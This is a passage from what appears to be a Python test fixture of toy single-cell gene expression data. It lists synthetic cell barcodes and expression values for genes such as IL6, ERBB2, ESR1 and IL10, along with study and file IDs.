"FoobarAB5_BazMoo_2CADBCDABDDCCCBD-1",
"FoobarAB3_BazMoo_3BBCCDBADBABBDCA-1",
"FoobarAB6_BazMoo_4DAACBADBACABADC-1",
"FoobarAB7_BazMoo_7BCABCCCACBAADDC-1",
"FoobarAB2_BazMoo_3BCDCBCCBCCCCBAC-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"IL6 Expression": {
"name": "IL6 Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
2.81,
2.81,
2.0,
2.81,
2.81,
3.0,
2.32,
3.0,
2.32,
2.32,
3.0,
2.81,
2.58,
2.0,
2.32,
1.58,
2.0,
2.58,
2.58,
3.0,
2.32,
1.0,
1.58,
2.32,
1.58,
2.81,
2.81,
1.0,
2.32,
3.0,
1.58,
2.58,
3.0,
3.0,
2.0,
2.32,
2.58,
3.0,
2.0,
2.32,
2.0,
1.58,
1.0,
3.0,
1.58,
1.58,
2.58,
2.81,
1.58,
3.0,
2.32,
3.0,
1.0,
2.58,
2.58,
2.81,
3.0,
1.0,
2.0,
2.58,
2.32,
3.0,
1.58,
2.0,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"MTHFR Cells": {
"name": "MTHFR Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB8_BazMoo_7ADDDBCAAAADBCAB-1",
"FoobarAB5_BazMoo_7DCACDAACCACBBBD-1",
"FoobarAB3_BazMoo_7ACACAAADCCDBADA-1",
"FoobarAB3_BazMoo_8ADDBCBACDCCACCD-1",
"FoobarAB2_BazMoo_8BDBABBACDCCDDBD-1",
"FoobarAB8_BazMoo_4CDBCDACADDDCABA-1",
"FoobarAB2_BazMoo_4AACCAACBCBAACDD-1",
"FoobarAB5_BazMoo_3DADDDCACDABCDCB-1",
"FoobarAB7_BazMoo_4ABDBBBACBCCBDAA-1",
"FoobarAB2_BazMoo_4DDCDADBBCDBAABB-1",
"FoobarAB5_BazMoo_1CACBDACACDDCCDD-1",
"FoobarAB3_BazMoo_8CDCBBDBCDBBDBCA-1",
"FoobarAB8_BazMoo_3CCABBAABDCCBDCB-1",
"FoobarAB6_BazMoo_4ACBACBAACAAADAD-1",
"FoobarAB8_BazMoo_4CBABCDBBDBCBCCA-1",
"FoobarAB2_BazMoo_8DDABDBCDABBBDAA-1",
"FoobarAB3_BazMoo_5CAADCDABADACAAC-1",
"FoobarAB1_BazMoo_1CDBDADAAACBAABD-1",
"FoobarAB1_BazMoo_5DDADDBCDDDCDABB-1",
"FoobarAB5_BazMoo_3BDBBDDDDDBBABAC-1",
"FoobarAB4_BazMoo_1DADCDAADADACBDD-1",
"FoobarAB3_BazMoo_1CCCCDBADDDDDAAB-1",
"FoobarAB6_BazMoo_7BDAABDCAADADBBA-1",
"FoobarAB6_BazMoo_4DBCDDCADAACCCDD-1",
"FoobarAB4_BazMoo_1ABABBCCADCADBAB-1",
"FoobarAB1_BazMoo_3DBBCDAABDACBCBB-1",
"FoobarAB4_BazMoo_4DDBADBCBACBDCDA-1",
"FoobarAB7_BazMoo_5ADBBAAABBCCBABB-1",
"FoobarAB4_BazMoo_8DCDBDACADABCDDB-1",
"FoobarAB4_BazMoo_6DDACDDBBBAADBCC-1",
"FoobarAB3_BazMoo_1DBADBBCAACCBDDC-1",
"FoobarAB7_BazMoo_8DCBCBBACADBBBAC-1",
"FoobarAB8_BazMoo_6BCCBDBADAABDCCD-1",
"FoobarAB7_BazMoo_7ACADCDBAABAACBD-1",
"FoobarAB8_BazMoo_2CCBCCBACABACCAB-1",
"FoobarAB3_BazMoo_8BCDBDDBDBDBDCBC-1",
"FoobarAB7_BazMoo_8BDCDBABDCCCBDDC-1",
"FoobarAB6_BazMoo_6DCADBCABDDCCAAA-1",
"FoobarAB1_BazMoo_3BDCBBDBACBABCCB-1",
"FoobarAB3_BazMoo_3BCBCBABBDBCDCAA-1",
"FoobarAB4_BazMoo_6ABCCABADCCDBCAA-1",
"FoobarAB3_BazMoo_4CACCAABBDCDBACD-1",
"FoobarAB5_BazMoo_4BBDDDADCAADDDBB-1",
"FoobarAB2_BazMoo_5CAAADCADACBDDCA-1",
"FoobarAB8_BazMoo_5CBBCCCADADDADDD-1",
"FoobarAB4_BazMoo_3BCADDCAAACBADBC-1",
"FoobarAB4_BazMoo_4CCCDAAACCACABBC-1",
"FoobarAB2_BazMoo_6BBDBDACBDBAACBA-1",
"FoobarAB4_BazMoo_1DCDCCCDBDBBABBB-1",
"FoobarAB5_BazMoo_8BACBBADCBDDBDAA-1",
"FoobarAB3_BazMoo_2ADDBAAACCDDDDAA-1",
"FoobarAB4_BazMoo_6ADADABCCDDBDACC-1",
"FoobarAB4_BazMoo_1CCACCABBBDABDCB-1",
"FoobarAB8_BazMoo_4BCABBACDAACCBCA-1",
"FoobarAB5_BazMoo_3DDACADDCAADCABB-1",
"FoobarAB5_BazMoo_7BAACDCDCBCBBACA-1",
"FoobarAB8_BazMoo_7DCADDBDCBABCBCA-1",
"FoobarAB4_BazMoo_1ABBDBDDDCBABACB-1",
"FoobarAB1_BazMoo_2BDDDCADCACDDCBB-1",
"FoobarAB7_BazMoo_3DDCCDCCDDBBAADB-1",
"FoobarAB3_BazMoo_3BBCCDBADBABBDCA-1",
"FoobarAB7_BazMoo_7BCABCCCACBAADDC-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"MTHFR Expression": {
"name": "MTHFR Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
1.0,
2.81,
1.0,
2.81,
2.0,
1.58,
2.58,
1.0,
1.0,
1.58,
1.0,
3.0,
2.32,
2.32,
1.58,
2.81,
1.58,
2.0,
1.0,
2.58,
1.0,
1.0,
1.58,
2.32,
1.0,
2.0,
2.81,
2.32,
3.0,
1.58,
1.58,
3.0,
1.58,
1.0,
2.32,
1.58,
2.81,
2.0,
2.81,
2.81,
1.0,
3.0,
1.0,
2.81,
2.0,
2.0,
1.58,
2.32,
2.81,
2.58,
2.81,
2.58,
2.0,
2.81,
2.0,
1.58,
2.58,
2.0,
1.0,
2.81,
1.0,
1.0,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"TGFB1 Cells": {
"name": "TGFB1 Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB4_BazMoo_2DABDACBCCCCADBC-1",
"FoobarAB8_BazMoo_1BDACCDCCBBADBCB-1",
"FoobarAB7_BazMoo_3ADABDACCCABBCBC-1",
"FoobarAB3_BazMoo_7BDDDBCADACBDDBC-1",
"FoobarAB3_BazMoo_8ADDBCBACDCCACCD-1",
"FoobarAB4_BazMoo_8DBCCDADBCBBCBDD-1",
"FoobarAB7_BazMoo_4DDBADDACABDABDD-1",
"FoobarAB8_BazMoo_6CBCADAABADDCCBC-1",
"FoobarAB7_BazMoo_6ABADABDAABBCDDB-1",
"FoobarAB4_BazMoo_2ACAADBCBDDADADB-1",
"FoobarAB4_BazMoo_6CADCBCCBCDACDBD-1",
"FoobarAB8_BazMoo_7CCACACCBDDBBCBB-1",
"FoobarAB2_BazMoo_3DABAABDAAAABAAB-1",
"FoobarAB1_BazMoo_8CDCBDACDAAACBBD-1",
"FoobarAB5_BazMoo_3CBDBBABBAACABCD-1",
"FoobarAB1_BazMoo_1CDBDADAAACBAABD-1",
"FoobarAB4_BazMoo_2BBDBCACBADBDDBA-1",
"FoobarAB3_BazMoo_7BCABDBCDBABBCBA-1",
"FoobarAB2_BazMoo_7DCAAACADCCADBAD-1",
"FoobarAB3_BazMoo_7DBDCDADBAAAABCD-1",
"FoobarAB1_BazMoo_3DBBCDAABDACBCBB-1",
"FoobarAB8_BazMoo_7CBCDDADACDDACAA-1",
"FoobarAB2_BazMoo_1DDDBDCCBCBCACAA-1",
"FoobarAB1_BazMoo_1BCCBCAADCCADCDB-1",
"FoobarAB5_BazMoo_3BADAABBDABABDAC-1",
"FoobarAB5_BazMoo_7AAABBCDCACCABAB-1",
"FoobarAB2_BazMoo_8DBCDDCCAACDDDCB-1",
"FoobarAB2_BazMoo_1ACCDADBABBACBCA-1",
"FoobarAB1_BazMoo_5BCAAACBABBCDBDC-1",
"FoobarAB2_BazMoo_5BCBDBBBDADCBDAC-1",
"FoobarAB1_BazMoo_7BDCABCBDAADCBBA-1",
"FoobarAB4_BazMoo_6ABCCABADCCDBCAA-1",
"FoobarAB6_BazMoo_1BDCADABBAACBCCD-1",
"FoobarAB5_BazMoo_8CCBBABDDADBBACD-1",
"FoobarAB4_BazMoo_7BADBDDCACBDCCCC-1",
"FoobarAB6_BazMoo_8DCBCBCBCDCBADBA-1",
"FoobarAB5_BazMoo_2ACDDDDADBCDDDCA-1",
"FoobarAB1_BazMoo_4CBCCBADBAABDDBB-1",
"FoobarAB2_BazMoo_5ADDADBBABBDCCAC-1",
"FoobarAB7_BazMoo_1BBADABCABACDADC-1",
"FoobarAB8_BazMoo_4BCABBACDAACCBCA-1",
"FoobarAB5_BazMoo_6DBCBCDABBADCCCB-1",
"FoobarAB7_BazMoo_2ACCDBBADCDCACAB-1",
"FoobarAB4_BazMoo_3BADBCDDABDDCDAB-1",
"FoobarAB7_BazMoo_3DDCCDCCDDBBAADB-1",
"FoobarAB5_BazMoo_1DDDDBBDAADDABCB-1",
"FoobarAB3_BazMoo_5DDBDBBBCBDBBBCD-1",
"FoobarAB8_BazMoo_6BDCBAACCCADDABB-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"TGFB1 Expression": {
"name": "TGFB1 Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
2.58,
2.32,
2.58,
1.58,
3.0,
2.0,
1.0,
2.81,
2.58,
2.0,
3.0,
2.81,
2.81,
2.58,
2.58,
2.32,
2.0,
1.0,
2.32,
1.58,
1.0,
3.0,
1.0,
3.0,
2.81,
3.0,
2.58,
1.58,
1.0,
1.0,
1.58,
2.81,
2.81,
1.58,
3.0,
2.81,
1.0,
2.32,
3.0,
2.58,
1.0,
1.58,
3.0,
2.0,
1.58,
1.58,
2.58,
3.0,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"ERBB2 Cells": {
"name": "ERBB2 Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB4_BazMoo_2DABDACBCCCCADBC-1",
"FoobarAB6_BazMoo_2ACBDBBABABABACC-1",
"FoobarAB8_BazMoo_1BDACCDCCBBADBCB-1",
"FoobarAB2_BazMoo_8DDACDAABBBBACDD-1",
"FoobarAB1_BazMoo_1BBDDDBDADDCACAB-1",
"FoobarAB3_BazMoo_7ACACAAADCCDBADA-1",
"FoobarAB6_BazMoo_4CBDCBCDACADDDDA-1",
"FoobarAB2_BazMoo_1CADBDBABCABBDDD-1",
"FoobarAB6_BazMoo_3BADDCCDACDAAAAD-1",
"FoobarAB6_BazMoo_7CBBCDBADBBBABDA-1",
"FoobarAB8_BazMoo_4CDBCDACADDDCABA-1",
"FoobarAB2_BazMoo_1AADDCCADACBADAD-1",
"FoobarAB7_BazMoo_5DAACACCCDADACBB-1",
"FoobarAB7_BazMoo_5BADDCDBCDDBCDAA-1",
"FoobarAB4_BazMoo_6CADCBCCBCDACDBD-1",
"FoobarAB8_BazMoo_7CCACACCBDDBBCBB-1",
"FoobarAB2_BazMoo_3DABAABDAAAABAAB-1",
"FoobarAB7_BazMoo_3ACBCBCACACDBADD-1",
"FoobarAB8_BazMoo_3CBCBADCDDBBBABA-1",
"FoobarAB7_BazMoo_5CBDCCDBCDBCDCCC-1",
"FoobarAB3_BazMoo_5CAADCDABADACAAC-1",
"FoobarAB8_BazMoo_1CBADADCCCCACAAC-1",
"FoobarAB3_BazMoo_7BCABDBCDBABBCBA-1",
"FoobarAB5_BazMoo_6AABBDADDABCDDCD-1",
"FoobarAB6_BazMoo_4DBCDDBAAAACAADC-1",
"FoobarAB3_BazMoo_1CCCCDBADDDDDAAB-1",
"FoobarAB8_BazMoo_8DCDABCAADDBAABC-1",
"FoobarAB4_BazMoo_1ABABBCCADCADBAB-1",
"FoobarAB6_BazMoo_6ABCBBDBAAADCDCC-1",
"FoobarAB6_BazMoo_4DACBDDDBDBDCADC-1",
"FoobarAB4_BazMoo_4DDBADBCBACBDCDA-1",
"FoobarAB2_BazMoo_8CCDBBDCCBBACDCB-1",
"FoobarAB1_BazMoo_1DADCCBAAACBDABC-1",
"FoobarAB4_BazMoo_6DDACDDBBBAADBCC-1",
"FoobarAB7_BazMoo_8DCBDADACBABCCCC-1",
"FoobarAB5_BazMoo_7AAABBCDCACCABAB-1",
"FoobarAB3_BazMoo_1DBADBBCAACCBDDC-1",
"FoobarAB6_BazMoo_1BCDADDDABDDBCDA-1",
"FoobarAB8_BazMoo_6BCCBDBADAABDCCD-1",
"FoobarAB8_BazMoo_2CCBCCBACABACCAB-1",
"FoobarAB5_BazMoo_8BCCCDBABCCADCAB-1",
"FoobarAB7_BazMoo_2BCBBBBCBCAAABDD-1",
"FoobarAB1_BazMoo_7BDCABCBDAADCBBA-1",
"FoobarAB1_BazMoo_3BDCBBDBACBABCCB-1",
"FoobarAB3_BazMoo_3BCBCBABBDBCDCAA-1",
"FoobarAB8_BazMoo_6DBAADCBDADCCDDB-1",
"FoobarAB3_BazMoo_2DBCBBDABAADBDCD-1",
"FoobarAB4_BazMoo_7BADBDDCACBDCCCC-1",
"FoobarAB3_BazMoo_2CACAABACDBCBCBA-1",
"FoobarAB4_BazMoo_2DDCCACACDBBACCC-1",
"FoobarAB8_BazMoo_6DADBACAAACBDDAA-1",
"FoobarAB8_BazMoo_1CBBCDBACADDAABB-1",
"FoobarAB6_BazMoo_1DCACCBBDBBBBCBB-1",
"FoobarAB7_BazMoo_1BBADABCABACDADC-1",
"FoobarAB2_BazMoo_1CCCBADCABBDBDAC-1",
"FoobarAB7_BazMoo_2ACCDBBADCDCACAB-1",
"FoobarAB2_BazMoo_7DABDADBDBADACDB-1",
"FoobarAB5_BazMoo_2DDBCCDBADBADCBC-1",
"FoobarAB5_BazMoo_2CADBCDABDDCCCBD-1",
"FoobarAB4_BazMoo_5CDCCABBCBACCCBC-1",
"FoobarAB3_BazMoo_8BDCBCBDCABACCCB-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"ERBB2 Expression": {
"name": "ERBB2 Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
3.0,
2.0,
2.58,
1.58,
2.81,
2.81,
2.81,
2.32,
2.58,
2.81,
1.0,
2.81,
2.81,
2.81,
2.32,
2.32,
2.58,
2.81,
3.0,
2.32,
1.58,
2.81,
2.32,
1.0,
2.58,
1.0,
2.32,
2.32,
3.0,
1.0,
1.0,
2.32,
2.32,
1.58,
3.0,
3.0,
1.58,
2.0,
3.0,
2.32,
1.58,
2.58,
2.0,
2.58,
3.0,
3.0,
2.32,
2.81,
2.81,
1.0,
1.0,
2.32,
1.58,
2.81,
2.81,
2.32,
1.0,
2.81,
2.58,
2.32,
1.0,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"ESR1 Cells": {
"name": "ESR1 Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB8_BazMoo_1BDACCDCCBBADBCB-1",
"FoobarAB2_BazMoo_8DDACDAABBBBACDD-1",
"FoobarAB3_BazMoo_6AACDDCDACBCBACD-1",
"FoobarAB3_BazMoo_7ACACAAADCCDBADA-1",
"FoobarAB7_BazMoo_3ADABDACCCABBCBC-1",
"FoobarAB3_BazMoo_8ADDBCBACDCCACCD-1",
"FoobarAB5_BazMoo_8DCCCBAABDDBDDDA-1",
"FoobarAB5_BazMoo_3CBBBDBACDBABBCA-1",
"FoobarAB7_BazMoo_5BADDCDBCDDBCDAA-1",
"FoobarAB6_BazMoo_3CDCABAAADCACCBA-1",
"FoobarAB1_BazMoo_3DCABADBDAADDCBD-1",
"FoobarAB1_BazMoo_8CDCBDACDAAACBBD-1",
"FoobarAB8_BazMoo_3CBCBADCDDBBBABA-1",
"FoobarAB7_BazMoo_5CCCBCDAABDBABAD-1",
"FoobarAB1_BazMoo_8DCCDCBDADCCAACD-1",
"FoobarAB5_BazMoo_1CBDCADACACCBCAD-1",
"FoobarAB4_BazMoo_2BBDBCACBADBDDBA-1",
"FoobarAB7_BazMoo_6CBBDBBCBCBDABAA-1",
"FoobarAB1_BazMoo_3BCBBBCBCDDCBDAB-1",
"FoobarAB8_BazMoo_7DDBCBACABDABBAA-1",
"FoobarAB2_BazMoo_1DDBAACABBACBDCA-1",
"FoobarAB6_BazMoo_4DBCDDBAAAACAADC-1",
"FoobarAB3_BazMoo_3BDBDACADBAADCCC-1",
"FoobarAB4_BazMoo_1DADCDAADADACBDD-1",
"FoobarAB6_BazMoo_8CBADCCBAAABBCBA-1",
"FoobarAB4_BazMoo_1ABABBCCADCADBAB-1",
"FoobarAB8_BazMoo_4BDDDDBCBCAABDDD-1",
"FoobarAB1_BazMoo_3DBBCDAABDACBCBB-1",
"FoobarAB7_BazMoo_4DDDDDBCCCBBADBD-1",
"FoobarAB4_BazMoo_8DCDBDACADABCDDB-1",
"FoobarAB4_BazMoo_6DDACDDBBBAADBCC-1",
"FoobarAB7_BazMoo_8DACBBCACDACDCBA-1",
"FoobarAB3_BazMoo_6DDDCDCADCCDBCBB-1",
"FoobarAB4_BazMoo_1BCDCDADBDBCBDAD-1",
"FoobarAB3_BazMoo_2CDDDCADDBDBDABB-1",
"FoobarAB3_BazMoo_8BCDBDDBDBDBDCBC-1",
"FoobarAB7_BazMoo_8BDCDBABDCCCBDDC-1",
"FoobarAB5_BazMoo_1DCBBBBDACADABAA-1",
"FoobarAB2_BazMoo_5BCBDBBBDADCBDAC-1",
"FoobarAB6_BazMoo_6DCADBCABDDCCAAA-1",
"FoobarAB1_BazMoo_7BDCABCBDAADCBBA-1",
"FoobarAB4_BazMoo_6ABCCABADCCDBCAA-1",
"FoobarAB2_BazMoo_5CAAADCADACBDDCA-1",
"FoobarAB4_BazMoo_4CCCDAAACCACABBC-1",
"FoobarAB2_BazMoo_6BBDBDACBDBAACBA-1",
"FoobarAB1_BazMoo_5DADBADCDDCBDAAB-1",
"FoobarAB6_BazMoo_1DCACCBBDBBBBCBB-1",
"FoobarAB1_BazMoo_8CBDADBABACDADAC-1",
"FoobarAB4_BazMoo_6ADADABCCDDBDACC-1",
"FoobarAB4_BazMoo_2CCACBADCCCCABAD-1",
"FoobarAB8_BazMoo_4BCABBACDAACCBCA-1",
"FoobarAB5_BazMoo_2CADBCDABDDCCCBD-1",
"FoobarAB8_BazMoo_5CBCADBCADABBCAB-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"ESR1 Expression": {
"name": "ESR1 Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
2.0,
2.0,
2.81,
2.0,
3.0,
2.81,
2.32,
1.0,
1.58,
2.81,
2.0,
2.81,
2.32,
2.0,
2.58,
2.0,
3.0,
1.58,
3.0,
2.0,
1.0,
3.0,
2.0,
1.58,
3.0,
2.0,
3.0,
2.81,
2.0,
1.0,
2.58,
1.0,
2.32,
2.0,
2.81,
1.58,
2.0,
3.0,
1.0,
2.58,
1.0,
1.58,
2.81,
2.81,
3.0,
2.58,
2.81,
1.0,
2.81,
2.81,
2.58,
3.0,
2.58,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"ACE Cells": {
"name": "ACE Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB4_BazMoo_2DABDACBCCCCADBC-1",
"FoobarAB8_BazMoo_7ADDDBCAAAADBCAB-1",
"FoobarAB1_BazMoo_1BBDDDBDADDCACAB-1",
"FoobarAB6_BazMoo_1ABAADCDCBDDACAB-1",
"FoobarAB8_BazMoo_4BDABCDCCBABACCC-1",
"FoobarAB4_BazMoo_8DBCCDADBCBBCBDD-1",
"FoobarAB7_BazMoo_7AADDADDDCADABDD-1",
"FoobarAB8_BazMoo_4CDBCDACADDDCABA-1",
"FoobarAB2_BazMoo_4DDCDADBBCDBAABB-1",
"FoobarAB3_BazMoo_2DACADABBDACCBDC-1",
"FoobarAB6_BazMoo_4ACBACBAACAAADAD-1",
"FoobarAB8_BazMoo_6BABCBBCDBBCACDD-1",
"FoobarAB1_BazMoo_8DCCDCBDADCCAACD-1",
"FoobarAB8_BazMoo_5CDDADACBAAACBAA-1",
"FoobarAB1_BazMoo_1CDBDADAAACBAABD-1",
"FoobarAB4_BazMoo_2BBDBCACBADBDDBA-1",
"FoobarAB8_BazMoo_1CBADADCCCCACAAC-1",
"FoobarAB8_BazMoo_6CADDCBBACDDBACB-1",
"FoobarAB6_BazMoo_2CAADBDADABBDCCB-1",
"FoobarAB6_BazMoo_8CBADCCBAAABBCBA-1",
"FoobarAB2_BazMoo_7DCAAACADCCADBAD-1",
"FoobarAB8_BazMoo_4BADABCDBDBDACAB-1",
"FoobarAB3_BazMoo_8CBDABBAAAAADBCD-1",
"FoobarAB8_BazMoo_4BDDDDBCBCAABDDD-1",
"FoobarAB7_BazMoo_4DDDDDBCCCBBADBD-1",
"FoobarAB2_BazMoo_1DDDBDCCBCBCACAA-1",
"FoobarAB7_BazMoo_8DACBBCACDACDCBA-1",
"FoobarAB7_BazMoo_8DCBDADACBABCCCC-1",
"FoobarAB3_BazMoo_5ACABCDCBDAAACAD-1",
"FoobarAB3_BazMoo_1DBADBBCAACCBDDC-1",
"FoobarAB5_BazMoo_6BCBABACCCDACDBB-1",
"FoobarAB4_BazMoo_3DBCDBDBDCDDCCAB-1",
"FoobarAB3_BazMoo_2CDDDCADDBDBDABB-1",
"FoobarAB3_BazMoo_8BCDBDDBDBDBDCBC-1",
"FoobarAB1_BazMoo_8CBBADABBCDAAAAA-1",
"FoobarAB2_BazMoo_2DABDDCDADBBDDBD-1",
"FoobarAB1_BazMoo_7BDCABCBDAADCBBA-1",
"FoobarAB3_BazMoo_6BACBCBCDAADDDAC-1",
"FoobarAB6_BazMoo_3DBACDBDAAADABDB-1",
"FoobarAB8_BazMoo_2CCBABBDDADCCDBD-1",
"FoobarAB4_BazMoo_7BADBDDCACBDCCCC-1",
"FoobarAB4_BazMoo_3BCADDCAAACBADBC-1",
"FoobarAB4_BazMoo_4CCCDAAACCACABBC-1",
"FoobarAB3_BazMoo_2CACAABACDBCBCBA-1",
"FoobarAB4_BazMoo_2DDCCACACDBBACCC-1",
"FoobarAB8_BazMoo_7DADCDCBCDDBDDDA-1",
"FoobarAB4_BazMoo_7CBDDABDBBDCBDBB-1",
"FoobarAB8_BazMoo_1CBBCDBACADDAABB-1",
"FoobarAB6_BazMoo_1DCACCBBDBBBBCBB-1",
"FoobarAB2_BazMoo_5DCCBDBABBDACAAB-1",
"FoobarAB8_BazMoo_4BCABBACDAACCBCA-1",
"FoobarAB5_BazMoo_3DDACADDCAADCABB-1",
"FoobarAB7_BazMoo_1CADCBBCDCBDDDDD-1",
"FoobarAB7_BazMoo_2ACCDBBADCDCACAB-1",
"FoobarAB4_BazMoo_3BADBCDDABDDCDAB-1",
"FoobarAB7_BazMoo_5DCDDDDABACBDACA-1",
"FoobarAB5_BazMoo_7DABADCCDABDBAAB-1",
"FoobarAB4_BazMoo_5CDCCABBCBACCCBC-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"ACE Expression": {
"name": "ACE Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
1.0,
1.0,
2.81,
1.58,
2.32,
3.0,
2.58,
2.32,
2.0,
2.0,
1.58,
2.0,
2.0,
3.0,
2.0,
2.81,
2.32,
3.0,
1.0,
2.81,
2.58,
3.0,
2.0,
1.58,
2.58,
2.81,
2.81,
1.0,
2.58,
2.0,
1.0,
1.0,
2.32,
2.81,
2.58,
2.81,
2.58,
2.81,
2.32,
2.0,
2.81,
2.58,
2.58,
3.0,
1.58,
1.0,
1.0,
1.0,
2.81,
2.81,
2.0,
2.0,
2.32,
2.32,
1.58,
1.0,
1.0,
3.0,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"IL10 Cells": {
"name": "IL10 Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB4_BazMoo_6ABAADADBBCAABDA-1",
"FoobarAB6_BazMoo_2ACBDBBABABABACC-1",
"FoobarAB5_BazMoo_5BBDADACAABADAAB-1",
"FoobarAB3_BazMoo_8BABABDBACACACCD-1",
"FoobarAB8_BazMoo_8CCBAADAAACCBDAD-1",
"FoobarAB1_BazMoo_1BBDDDBDADDCACAB-1",
"FoobarAB2_BazMoo_3DDDDDBCAAAABCBA-1",
"FoobarAB7_BazMoo_1DBAACCBDDDCBCDB-1",
"FoobarAB6_BazMoo_3BADDCCDACDAAAAD-1",
"FoobarAB3_BazMoo_1DABABDBDCCDBCBA-1",
"FoobarAB6_BazMoo_7CBBCDBADBBBABDA-1",
"FoobarAB8_BazMoo_6CBCADAABADDCCBC-1",
"FoobarAB2_BazMoo_4DDCDADBBCDBAABB-1",
"FoobarAB3_BazMoo_7DCACACACDCADCBD-1",
"FoobarAB8_BazMoo_4CBABCDBBDBCBCCA-1",
"FoobarAB4_BazMoo_6CBCDABADDDDCBDD-1",
"FoobarAB4_BazMoo_2BBDBCACBADBDDBA-1",
"FoobarAB7_BazMoo_6CBBDBBCBCBDABAA-1",
"FoobarAB3_BazMoo_7BCABDBCDBABBCBA-1",
"FoobarAB8_BazMoo_7DDBCBACABDABBAA-1",
"FoobarAB2_BazMoo_1DDBAACABBACBDCA-1",
"FoobarAB5_BazMoo_6AABBDADDABCDDCD-1",
"FoobarAB8_BazMoo_8DCDABCAADDBAABC-1",
"FoobarAB8_BazMoo_4BADABCDBDBDACAB-1",
"FoobarAB3_BazMoo_8CBDABBAAAAADBCD-1",
"FoobarAB7_BazMoo_4DDDDDBCCCBBADBD-1",
"FoobarAB3_BazMoo_1DBABCBBAABBABBB-1",
"FoobarAB5_BazMoo_3BADAABBDABABDAC-1",
"FoobarAB3_BazMoo_6DDDCDCADCCDBCBB-1",
"FoobarAB5_BazMoo_7AAABBCDCACCABAB-1",
"FoobarAB6_BazMoo_1BCDADDDABDDBCDA-1",
"FoobarAB2_BazMoo_1CABCCCACABCCACA-1",
"FoobarAB4_BazMoo_3DBCDBDBDCDDCCAB-1",
"FoobarAB5_BazMoo_3CDAABAABBACAAAC-1",
"FoobarAB1_BazMoo_8CBBADABBCDAAAAA-1",
"FoobarAB5_BazMoo_1DCBBBBDACADABAA-1",
"FoobarAB2_BazMoo_5BCBDBBBDADCBDAC-1",
"FoobarAB1_BazMoo_7BDCABCBDAADCBBA-1",
"FoobarAB4_BazMoo_3BCADDCAAACBADBC-1",
"FoobarAB3_BazMoo_4CABACABDCCCADCA-1",
"FoobarAB4_BazMoo_5CAADDAABBADCDCD-1",
"FoobarAB2_BazMoo_5DCCBDBABBDACAAB-1",
"FoobarAB4_BazMoo_2CCACBADCCCCABAD-1",
"FoobarAB7_BazMoo_1CADCBBCDCBDDDDD-1",
"FoobarAB5_BazMoo_6DBCBCDABBADCCCB-1",
"FoobarAB7_BazMoo_2ACCDBBADCDCACAB-1",
"FoobarAB3_BazMoo_8AAABDDBDDCBDDAB-1",
"FoobarAB7_BazMoo_5DCDDDDABACBDACA-1",
"FoobarAB4_BazMoo_1ABBDBDDDCBABACB-1",
"FoobarAB5_BazMoo_2CADBCDABDDCCCBD-1",
"FoobarAB7_BazMoo_3DDCCDCCDDBBAADB-1",
"FoobarAB5_BazMoo_8DDCCCBABCBACABB-1",
"FoobarAB7_BazMoo_7BCABCCCACBAADDC-1",
